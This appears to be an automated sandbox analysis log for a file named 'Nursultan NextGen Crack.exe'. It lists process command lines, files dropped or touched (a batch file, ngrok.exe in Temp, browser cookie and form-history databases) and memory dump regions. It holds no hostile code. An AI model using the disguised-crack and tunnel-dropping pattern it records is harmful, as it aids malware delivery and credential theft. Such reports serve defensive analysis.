"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.0.1557007371\591080285" -parentBuildID 20230214051806 -prefsHandle 1696 -prefMapHandle 1688 -prefsLen 24458 -prefMapSize 235380 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cea7204e-4409-4070-a27f-af8dc63def01} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 1780 236d7524858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.1.401038634\374382183" -parentBuildID 20230214051806 -prefsHandle 2220 -prefMapHandle 2216 -prefsLen 24458 -prefMapSize 235380 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4f82b78-7d51-47a4-9223-80a1da0b272b} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 2232 236cb289658 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.2.822381599\1780858027" -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 3116 -prefsLen 24854 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {033c922d-41fc-475c-a190-18a553c8529c} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 3128 236da82ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.3.554853271\724390326" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 29448 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10b0350b-461b-462f-87bf-6a8a740be6ff} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 3584 236dd459658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.4.428928837\106845635" -childID 3 -isForBrowser -prefsHandle 4768 -prefMapHandle 4764 -prefsLen 30263 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f2bdfd9-6754-4e57-aaa2-69861af8917f} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 4780 236ded23258 tab

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa39b5855 /state1:0x41c64e6d

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Files

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

C:\Users\Admin\AppData\Roaming\и.bat

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_alvh1ln0.jry.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\activity-stream.discovery_stream.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

\??\pipe\crashpad_3532_RYGQZKMEPPRXGKBI

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Temp\ngrok.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.log

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59479e.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-6-25.1247.5604.1.odl

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-6-25.1248.5444.1.odl

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\C6A6389A9162CEB2E1F41436B370871FECA58F75

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\doomed\11919

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\xulstore.json

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\startupCache\urlCache.bin

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\permissions.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cookies.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\storage.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionCheckpoints.json

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\favicons.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\places.sqlite

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\254256B27E0C48CF9B80B695F0B3B8CA84610495

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\protections.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\datareporting\glean\db\data.safe.bin

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\AlternateServices.txt

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\datareporting\state.json

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\SiteSecurityServiceState.txt

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cert9.db

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\F18D85F52EBBBA2AB081EF739ED0D6E8A76D497C

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\formhistory.sqlite

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\D144A5C8C7E3227DABBD707932919BB599093AF0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\storage\default\https+++www.google.com\ls\data.sqlite

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\075B8FCF1E4761117058C2EFF149858F93A6A354

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\3C7712659D18F9BDD24B44DD2EE887F2D1CA3EAE

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\F96A1A8368D3C3DD1FA81D170326E6C1C65D342F

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\8540EC873F08CBAD5DF5121BD3BABF95624B4A14

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\0BABF52A64DC7B1FCCDD563D131A086B80FE77E0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\FFD8AD8D64C343A2A6ADF3BB0B35D1D20AAED475

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Local\Temp\jusched.log

C:\Users\Admin\AppData\Local\Temp\MSIC237.tmp

C:\Config.Msi\e5bc1e7.rbs

C:\Config.Msi\e5bc1ea.rbs

C:\Config.Msi\e5bc1ed.rbs

C:\Config.Msi\e5bc1f0.rbs

C:\Config.Msi\e5bc1fe.rbf

C:\Config.Msi\e5bc1f3.rbs

memory/32-1028-0x000000001B730000-0x000000001B73A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\doomed\19787

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\54EA96798C26EF0ACA2E1D05572EA911A300BE26

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\crashes\store.json.mozlz4.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\Downloads\aida64extreme730.exe

C:\Users\Admin\Downloads\aida64extreme730.exe:Zone.Identifier

C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe

memory/3484-1532-0x0000000000400000-0x0000000004EFC000-memory.dmp

memory/32-1557-0x000000001BCA0000-0x000000001BCAC000-memory.dmp

memory/3484-1559-0x0000000000400000-0x0000000004EFC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XU9N0J3P\www.bing[1].xml

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\xulstore.json.tmp

memory/32-2230-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp